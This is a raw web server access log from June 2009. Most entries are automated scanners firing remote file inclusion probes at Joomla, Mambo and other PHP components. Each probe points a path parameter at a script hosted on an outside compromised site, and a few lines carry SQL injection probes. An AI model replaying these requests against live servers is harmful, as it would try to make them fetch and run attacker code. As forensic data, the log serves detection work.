74.53.70.114 - - [22/Jun/2009:03:00:51 -0400] "GET /logs/access_log.Q109061100///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:03:00:51 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:04 -0400] "GET /logs//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:04 -0400] "GET //index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:04 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:03:01:07 -0400] "GET /logs/access_log.Q109060300///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 308 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:09 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:09 -0400] "GET /logs//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:09 -0400] "GET //index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:10 -0400] "GET //index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:10 -0400] "GET /logs//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:01:10 -0400] "GET /logs/access_log.Q109061400//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:01:10 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:01:25 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:03:01:26 -0400] "GET /logs/access_log.Q109051600%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:03:01:36 -0400] "GET /logs/access_log.Q109052400%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 296 "-" "Mozilla/5.0"
88.191.89.138 - - [22/Jun/2009:03:01:39 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?p=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.221.37.118 - - [22/Jun/2009:03:01:49 -0400] "GET /logs/access_log.Q109061400%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:03:02:15 -0400] "GET /logs/access_log.Q109051500/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:03:03:00 -0400] "GET /logs/access_log.Q109051500/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.189.18.73 - - [22/Jun/2009:03:03:01 -0400] "GET /logs/access_log.Q109051500/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:03:03:35 -0400] "GET /logs/access_log.Q109061800%20//doceboCms/class/class.dashboard_cms.php?root_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
195.34.78.110 - - [22/Jun/2009:03:03:35 -0400] "GET //doceboCms/class/class.dashboard_cms.php?root_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
195.34.78.110 - - [22/Jun/2009:03:03:35 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?root_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
66.221.37.118 - - [22/Jun/2009:03:04:36 -0400] "GET /logs/access_log.Q109050800%20%20//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:03:04:53 -0400] "GET /logs/access_log.Q109061100%20%20///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:03:04:53 -0400] "GET /logs/access_log.Q109060300%20%20///////administrator////components//////com_serverstat////////install.serverstat.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 310 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:03:05:45 -0400] "GET /logs/access_log.Q109061600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.111.94.201 - - [22/Jun/2009:03:06:08 -0400] "GET /logs//atom.php5?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:06:08 -0400] "GET /logs/error_log.Q109052300//atom.php5?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:06:10 -0400] "GET //atom.php5?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:06:11 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [22/Jun/2009:03:06:16 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?root_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
209.59.12.99 - - [22/Jun/2009:03:06:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.89.139 - - [22/Jun/2009:03:06:31 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:03:06:31 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:03:06:31 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:06:36 -0400] "GET //atom.php5?page=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:06:36 -0400] "GET /logs//atom.php5?page=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.71.14 - - [22/Jun/2009:03:06:36 -0400] "GET /images/index5_pliers.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
84.201.208.50 - - [22/Jun/2009:03:06:37 -0400] "GET /logs/access_log.Q109060600//index2.php?id=' HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
84.201.208.50 - - [22/Jun/2009:03:06:37 -0400] "GET //index2.php?id=' HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
84.201.208.50 - - [22/Jun/2009:03:06:38 -0400] "GET /logs//index2.php?id=' HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
217.160.79.161 - - [22/Jun/2009:03:06:40 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [22/Jun/2009:03:07:10 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:03:07:10 -0400] "GET /home.php?pagina=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 206 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:03:07:10 -0400] "GET /logs/home.php?pagina=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
121.165.73.157 - - [22/Jun/2009:03:07:15 -0400] "GET /logs/access_log.Q109053100/home.php?pagina=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.34.78.110 - - [22/Jun/2009:03:07:22 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?root_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
217.160.79.161 - - [22/Jun/2009:03:07:35 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:03:07:37 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.64.89.139 - - [22/Jun/2009:03:07:43 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:07:59 -0400] "GET /logs/error_log.Q109052300%20%20//atom.php5?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:07:59 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:08:28 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:36 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:36 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:36 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:42 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:42 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:42 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:43 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:44 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:45 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:03:08:46 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:48 -0400] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:49 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:08:49 -0400] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 6510 "-" "Mozilla/5.0"
209.172.33.230 - - [22/Jun/2009:03:09:16 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.207.160.102 - - [22/Jun/2009:03:09:17 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
84.201.208.50 - - [22/Jun/2009:03:09:18 -0400] "GET /logs/access_log.Q109053100//index2.php?id=' HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
88.191.89.138 - - [22/Jun/2009:03:09:23 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:03:10:09 -0400] "GET /phphtml.php?htmlclass_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:03:10:09 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:03:10:09 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:18 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:21 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:32 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:34 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:35 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:35 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
58.227.193.198 - - [22/Jun/2009:03:10:37 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:38 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:10:38 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.71.54 - - [22/Jun/2009:03:10:54 -0400] "GET /images/store_handpc_sec_over.jpg HTTP/1.1" 200 8331 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [22/Jun/2009:03:11:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.165.73.157 - - [22/Jun/2009:03:11:54 -0400] "GET /logs/access_log.Q109052200%20/home.php?pagina=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
208.111.94.201 - - [22/Jun/2009:03:13:28 -0400] "GET //ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:13:29 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:13:29 -0400] "GET /logs/error_log.Q109061000%20%20//ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:13:43 -0400] "GET /logs/access_log.Q109061000%20%20//ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.103.72.130 - - [22/Jun/2009:03:13:59 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:10 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:10 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:10 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:11 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:11 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:11 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:14 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.122.179.44 - - [22/Jun/2009:03:14:18 -0400] "GET /logs/error_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.campani.net/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:15:33 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:15:37 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.49.99.7 - - [22/Jun/2009:03:15:44 -0400] "GET /logs/access_log.Q109050800//index.php?p=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:16:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.111.94.201 - - [22/Jun/2009:03:16:45 -0400] "GET /logs/error_log.Q109061000//ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:16:47 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:03:17:04 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:03:17:04 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
83.98.209.71 - - [22/Jun/2009:03:17:04 -0400] "GET /logs/access_log.Q109031800%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:18:51 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:18:51 -0400] "GET /logs/access_log.Q109051300///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:18:51 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 200 6516 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:19:35 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
198.31.50.73 - - [22/Jun/2009:03:19:45 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.6.17.151 - - [22/Jun/2009:03:20:05 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.151 - - [22/Jun/2009:03:20:06 -0400] "GET /logs/access_log.Q107052000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
83.98.209.71 - - [22/Jun/2009:03:20:08 -0400] "GET /logs/access_log.Q109051200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:20:26 -0400] "GET /logs/error_log.Q108082400//ashnews.php?pathtoashnews=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:21:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.121.137.51 - - [22/Jun/2009:03:23:37 -0400] "GET /errors.php?error=http://www.eyepro.net//assets/images/beast-test.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
91.121.137.51 - - [22/Jun/2009:03:23:37 -0400] "GET /logs/errors.php?error=http://www.eyepro.net//assets/images/beast-test.txt?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
74.6.17.151 - - [22/Jun/2009:03:25:30 -0400] "GET /logs/access_log.Q109012800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.200.54 - - [22/Jun/2009:03:25:49 -0400] "GET /logs/access_log.Q109061300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:25:59 -0400] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:25:59 -0400] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:25:59 -0400] "GET /logs/access_log.Q109053000//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:26:01 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.94.155.59 - - [22/Jun/2009:03:26:05 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.111.94.201 - - [22/Jun/2009:03:26:11 -0400] "GET /logs/access_log.Q109051700//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:03:26:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.200.54 - - [22/Jun/2009:03:26:17 -0400] "GET /logs/access_log.Q109052100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:26:27 -0400] "GET /logs/access_log.Q109051000%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
94.23.200.54 - - [22/Jun/2009:03:26:27 -0400] "GET /logs/access_log.Q109052400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:26:28 -0400] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
217.160.79.161 - - [22/Jun/2009:03:26:28 -0400] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
